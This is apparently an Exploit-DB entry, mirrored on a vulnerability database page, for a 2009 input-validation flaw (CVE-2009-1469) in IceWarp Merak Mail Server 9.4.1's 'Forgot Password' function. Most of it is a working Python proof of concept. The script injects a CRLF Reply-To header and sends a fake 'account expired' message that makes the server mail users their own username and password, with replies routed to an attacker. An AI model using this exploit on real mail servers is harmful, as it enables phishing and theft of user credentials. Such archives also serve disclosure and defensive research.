Lucene search
+L

IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation

🗓️ 05 May 2009 00:00:00Reported by RedTeam Pentesting GmbHType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

IceWarp Merak Mail Server 9.4.1 'Forgot Password' Input Validation vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
IceWarp Merak WebMail Server < 9.4.2 Multiple Vulnerabilities
18 Aug 200400:00
nessus
nessus
Tenable Nessus
IceWarp Merak WebMail Server < 9.4.2 Multiple Vulnerabilities
8 May 200900:00
nessus
circl
Circl
CVE-2009-1469
5 May 200900:00
circl
cve
CVE
CVE-2009-1469
5 May 200920:00
cve
cvelist
Cvelist
CVE-2009-1469
5 May 200920:00
cvelist
euvd
EUVD
EUVD-2009-1467
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1469
5 May 200920:30
nvd
openvas
OpenVAS
Ubuntu USN-769-1 (libwmf)
5 Jun 200900:00
openvas
packetstorm
Packet Storm
IceWarp WebMail Mail Forgery
5 May 200900:00
packetstorm
prion
Prion
Crlf injection
5 May 200920:30
prion
Rows per page
source: https://www.securityfocus.com/bid/34827/info

IceWarp Merak Mail Server is prone to an input-validation vulnerability because it uses client-supplied data when performing a 'Forgot Password' function.

Attackers can exploit this issue via social-engineering techniques to obtain valid users' login credentials; other attacks may also be possible.

#! /usr/bin/env python
import urllib2, sys

conf = {
 "captcha_uid": "5989688782215156001239966846169",
 "captcha": "4SJZ Z4GY",
 "forgot": "[email protected]",
 "replyto": "[email protected]",
 "server": "http://www.example.com/webmail/server/webmail.php"
}

data = """
<iq type="set">
 <query xmlns="webmail:iq:auth">
   <forgot>%(forgot)s</forgot>
   <captcha uid="%(captcha_uid)s">%(captcha)s</captcha>
   <subject>
     <![CDATA[
       Account expiration %EMAIL%\r\nReply-To: %(replyto)s\n
     ]]>
   </subject>
   <message>
     Dear %FULLNAME%,

     your account

     Username: %USERNAME%
     Password: %PASSWORD%

     has expired. To renew the account, please reply to this email
     leaving the email body intact, so we know the account is still
     used.

     Kind regards,

     the IT department
   </message>
 </query>
</iq>
""" % conf

req = urllib2.Request(conf['server'])
req.add_data(data)
res = urllib2.urlopen(req)
print repr(res.read())

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation